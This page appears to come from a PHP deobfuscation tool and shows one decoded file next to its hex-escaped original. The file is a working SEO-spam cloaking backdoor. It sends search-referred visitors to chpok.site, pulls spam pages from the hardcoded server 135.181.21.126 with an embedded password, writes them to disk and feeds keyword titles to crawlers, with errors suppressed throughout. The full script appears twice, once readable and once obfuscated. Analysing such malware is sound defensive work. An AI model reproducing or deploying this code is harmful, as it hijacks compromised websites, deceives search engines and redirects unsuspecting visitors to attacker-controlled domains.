Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php goto LFSdC; ZEo1P: if ( strpos( $_SERVER["\x48\x54\124\x50\x5f\122\..
Decoded Output download
<?php
goto LFSdC;
ZEo1P:
if (
strpos(
$_SERVER["HTTP_REFERER"],
"google."
) or
strpos(
$_SERVER["HTTP_REFERER"],
"yahoo."
) or
strpos(
$_SERVER["HTTP_REFERER"],
"bing."
)
) {
header(
"Location: https://chpok.site/enter/?mark={$today}-{$s}&engkey={$keyword}"
);
die();
} else {
$myname = $_GET["id"] . ".php";
if (file_exists("index/" . $myname)) {
$html = @file_get_contents("index/" . $myname);
if (
strpos(
$_SERVER[
"HTTP_USER_AGENT"
],
"bing"
) >
2 or
strpos(
$_SERVER[
"HTTP_USER_AGENT"
],
"yahoo"
) >
2
) {
$keyword = str_replace("-", " ", $_GET["id"]);
$html = str_replace(
"<title></title>",
"<title>{$keyword}</title>",
$html
);
}
echo $html;
die();
}
}
goto V_aKG;
QJZeV:
if (($s == "\") | ($s == "/")) {
$s = "";
}
goto KOIk2;
vy5uL:
if ($_GET["id"] == "testing") {
echo "test good...";
die();
}
goto krSyu;
BpP3C:
$xx1 = 5;
goto zMbLH;
lPr5r:
$apass1 = "visdoijew";
goto VkMtz;
tcpjB:
$apass3 = "rv32ydacsvsdv";
goto bdM4c;
GKjxS:
if (
strpos(
$_SERVER[
"HTTP_USER_AGENT"
],
"bing"
) >
2 or
strpos(
$_SERVER[
"HTTP_USER_AGENT"
],
"yahoo"
) >
2
) {
$text = str_replace(
"<title></title>",
"<title>{$keyword}</title>",
$text
);
}
goto AQmS_;
LUvBM:
if (strlen($text) < 5000) {
$url = "135.181.21.126";
$fp = fsockopen($url, 80, $errno, $errstr, 30);
if (!$fp) {
echo "{$errstr} ({$errno})<br />\xa";
} else {
$req =
"/" .
$_GET["fn"] .
".php?pass={$apass}&q={$_GET["id"]}";
$out = "GET {$req} HTTP/1.0\xd\xa";
$out .= "Host: {$url}
\xa";
$out .=
"Connection: Close
\xd\xa";
fwrite($fp, $out);
while (!feof($fp)) {
$text = $text . fgets($fp, 2048);
}
fclose($fp);
}
fclose($out);
$text = explode("
", $text);
$text = $text[7];
}
goto GhrST;
ho7PJ:
$text = "";
goto RPC3t;
LFSdC:
error_reporting(0);
goto V5o7v;
buFfR:
$keyword = str_replace(" ", "+", $keyword);
goto Jrj2m;
krSyu:
if ($_GET["id"] == "index") {
header(
"Location: https://google.com"
);
die();
}
goto ETX4l;
bdM4c:
$apass = "{$apass1}" . "{$apass2}" . "{$apass3}";
goto ZEo1P;
V5o7v:
$today = "20231227-";
goto A9HzL;
A9HzL:
foreach ($_GET as $a => $b) {
$_GET["id"] = $b;
}
goto vy5uL;
AQmS_:
echo $text;
goto Uf7uS;
l7rkL:
$_GET["fn"] = "696969new";
goto lPr5r;
VkMtz:
$x1 = 3;
goto BpP3C;
D3y1o:
$s = dirname($_SERVER["PHP_SELF"]);
goto QJZeV;
Jrj2m:
$apass2 = "b23hr23vr32";
goto D3y1o;
V_aKG:
$query_pars_2 = str_replace("-", "+", $_GET["id"]);
goto ho7PJ;
ETX4l:
$_GET["world"] = 5;
goto l7rkL;
GhrST:
if (strlen($text) > 5000) {
$out = fopen("index/" . $myname, "w");
fwrite($out, $text);
fclose($out);
}
goto GKjxS;
rQTN0:
if (strlen($text) < 5000) {
$text = file_get_contents(
"http://135.181.21.126/" .
$_GET["fn"] .
".php?pass={$apass}&q={$_GET["id"]}"
);
}
goto LUvBM;
KOIk2:
$s = $_SERVER["SERVER_NAME"] . $s;
goto tcpjB;
zMbLH:
$keyword = str_replace("-", " ", $_GET["id"]);
goto buFfR;
RPC3t:
if (function_exists("curl_init")) {
$ch = curl_init();
curl_setopt(
$ch,
CURLOPT_URL,
"http://135.181.21.126/" .
$_GET["fn"] .
".php?pass={$apass}&q={$_GET["id"]}"
);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt(
$ch,
CURLOPT_USERAGENT,
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
);
$text = curl_exec($ch);
curl_close($ch);
}
goto rQTN0;
Uf7uS: ?>
Did this file decode correctly?
Original Code
<?php
goto LFSdC;
ZEo1P:
if (
strpos(
$_SERVER["\x48\x54\124\x50\x5f\122\x45\106\x45\x52\105\122"],
"\147\157\157\147\x6c\145\x2e"
) or
strpos(
$_SERVER["\110\x54\x54\x50\137\x52\x45\x46\x45\x52\105\x52"],
"\171\x61\x68\x6f\x6f\56"
) or
strpos(
$_SERVER["\110\124\124\120\x5f\122\105\x46\105\x52\105\122"],
"\142\x69\x6e\x67\56"
)
) {
header(
"\114\157\x63\x61\x74\x69\157\x6e\72\x20\x68\x74\x74\160\x73\x3a\x2f\57\x63\150\x70\x6f\153\x2e\163\x69\164\145\x2f\145\156\x74\x65\162\x2f\77\x6d\141\x72\153\x3d{$today}\x2d{$s}\46\x65\156\x67\x6b\145\171\75{$keyword}"
);
die();
} else {
$myname = $_GET["\x69\x64"] . "\56\160\150\160";
if (file_exists("\151\156\144\x65\170\57" . $myname)) {
$html = @file_get_contents("\x69\x6e\144\145\170\x2f" . $myname);
if (
strpos(
$_SERVER[
"\x48\x54\x54\120\x5f\x55\x53\105\122\137\101\107\105\x4e\x54"
],
"\x62\151\x6e\x67"
) >
2 or
strpos(
$_SERVER[
"\110\124\124\120\x5f\125\x53\x45\122\x5f\x41\107\x45\x4e\x54"
],
"\171\x61\150\157\157"
) >
2
) {
$keyword = str_replace("\x2d", "\40", $_GET["\x69\144"]);
$html = str_replace(
"\x3c\x74\151\x74\154\x65\76\x3c\57\164\x69\164\154\x65\x3e",
"\x3c\164\151\x74\154\145\76{$keyword}\74\x2f\x74\x69\x74\x6c\x65\x3e",
$html
);
}
echo $html;
die();
}
}
goto V_aKG;
QJZeV:
if (($s == "\134") | ($s == "\57")) {
$s = "";
}
goto KOIk2;
vy5uL:
if ($_GET["\151\x64"] == "\x74\145\x73\x74\151\x6e\147") {
echo "\x74\x65\x73\164\x20\147\x6f\157\144\56\x2e\x2e";
die();
}
goto krSyu;
BpP3C:
$xx1 = 5;
goto zMbLH;
lPr5r:
$apass1 = "\x76\151\163\144\x6f\151\x6a\145\x77";
goto VkMtz;
tcpjB:
$apass3 = "\162\x76\63\62\x79\x64\141\x63\x73\x76\163\144\x76";
goto bdM4c;
GKjxS:
if (
strpos(
$_SERVER[
"\x48\124\124\120\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"
],
"\x62\x69\156\x67"
) >
2 or
strpos(
$_SERVER[
"\x48\124\x54\120\137\x55\x53\x45\x52\x5f\101\107\105\116\124"
],
"\171\141\x68\157\x6f"
) >
2
) {
$text = str_replace(
"\74\x74\x69\x74\154\145\x3e\x3c\57\164\x69\164\x6c\x65\76",
"\x3c\x74\x69\164\x6c\145\x3e{$keyword}\74\57\x74\x69\164\154\145\x3e",
$text
);
}
goto AQmS_;
LUvBM:
if (strlen($text) < 5000) {
$url = "\61\63\65\x2e\x31\x38\x31\x2e\x32\x31\56\x31\x32\x36";
$fp = fsockopen($url, 80, $errno, $errstr, 30);
if (!$fp) {
echo "{$errstr}\40\x28{$errno}\51\74\x62\x72\x20\x2f\76\xa";
} else {
$req =
"\57" .
$_GET["\146\156"] .
"\56\x70\150\x70\77\160\141\x73\163\x3d{$apass}\x26\161\x3d{$_GET["\x69\x64"]}";
$out = "\x47\105\x54\40{$req}\x20\110\124\x54\120\x2f\61\56\x30\xd\xa";
$out .= "\110\x6f\163\164\x3a\x20{$url}\15\xa";
$out .=
"\x43\157\x6e\156\x65\143\164\x69\x6f\156\x3a\40\103\x6c\157\x73\x65\15\12\xd\xa";
fwrite($fp, $out);
while (!feof($fp)) {
$text = $text . fgets($fp, 2048);
}
fclose($fp);
}
fclose($out);
$text = explode("\12", $text);
$text = $text[7];
}
goto GhrST;
ho7PJ:
$text = "";
goto RPC3t;
LFSdC:
error_reporting(0);
goto V5o7v;
buFfR:
$keyword = str_replace("\x20", "\53", $keyword);
goto Jrj2m;
krSyu:
if ($_GET["\x69\144"] == "\x69\x6e\144\145\x78") {
header(
"\x4c\157\x63\x61\x74\151\157\156\72\x20\150\164\x74\x70\x73\x3a\x2f\x2f\x67\157\157\x67\x6c\145\x2e\x63\x6f\155"
);
die();
}
goto ETX4l;
bdM4c:
$apass = "{$apass1}" . "{$apass2}" . "{$apass3}";
goto ZEo1P;
V5o7v:
$today = "\x32\x30\x32\63\61\x32\62\x37\55";
goto A9HzL;
A9HzL:
foreach ($_GET as $a => $b) {
$_GET["\151\x64"] = $b;
}
goto vy5uL;
AQmS_:
echo $text;
goto Uf7uS;
l7rkL:
$_GET["\x66\156"] = "\x36\71\66\71\x36\x39\x6e\x65\167";
goto lPr5r;
VkMtz:
$x1 = 3;
goto BpP3C;
D3y1o:
$s = dirname($_SERVER["\120\x48\x50\137\123\105\x4c\x46"]);
goto QJZeV;
Jrj2m:
$apass2 = "\x62\x32\63\x68\x72\x32\x33\166\162\63\x32";
goto D3y1o;
V_aKG:
$query_pars_2 = str_replace("\55", "\x2b", $_GET["\x69\x64"]);
goto ho7PJ;
ETX4l:
$_GET["\167\157\162\154\x64"] = 5;
goto l7rkL;
GhrST:
if (strlen($text) > 5000) {
$out = fopen("\151\156\144\145\x78\57" . $myname, "\x77");
fwrite($out, $text);
fclose($out);
}
goto GKjxS;
rQTN0:
if (strlen($text) < 5000) {
$text = file_get_contents(
"\150\164\164\x70\x3a\57\x2f\61\x33\x35\x2e\61\70\x31\x2e\x32\x31\56\61\62\x36\x2f" .
$_GET["\x66\x6e"] .
"\x2e\160\150\x70\x3f\x70\x61\163\x73\75{$apass}\46\161\x3d{$_GET["\x69\x64"]}"
);
}
goto LUvBM;
KOIk2:
$s = $_SERVER["\123\105\x52\126\x45\122\137\x4e\x41\x4d\105"] . $s;
goto tcpjB;
zMbLH:
$keyword = str_replace("\55", "\x20", $_GET["\x69\x64"]);
goto buFfR;
RPC3t:
if (function_exists("\143\165\x72\154\x5f\151\x6e\151\164")) {
$ch = curl_init();
curl_setopt(
$ch,
CURLOPT_URL,
"\150\x74\164\x70\72\x2f\57\x31\63\65\x2e\61\x38\x31\56\62\x31\56\61\x32\x36\57" .
$_GET["\146\x6e"] .
"\56\x70\x68\160\77\x70\x61\x73\163\x3d{$apass}\46\161\x3d{$_GET["\x69\x64"]}"
);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 4);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt(
$ch,
CURLOPT_USERAGENT,
"\115\x6f\172\151\154\x6c\x61\57\x34\56\x30\40\50\x63\x6f\x6d\160\141\164\x69\142\x6c\145\x3b\x20\x4d\x53\111\105\40\66\x2e\x30\x3b\40\127\151\x6e\144\x6f\x77\163\40\x4e\x54\x20\x35\x2e\x31\x3b\40\123\126\x31\51"
);
$text = curl_exec($ch);
curl_close($ch);
}
goto rQTN0;
Uf7uS: ?>
Function Calls
| None |
Stats
| MD5 | 7bb34ff41c48f5f66c9ffd2d283a4bf1 |
| Eval Count | 0 |
| Decode Time | 66 ms |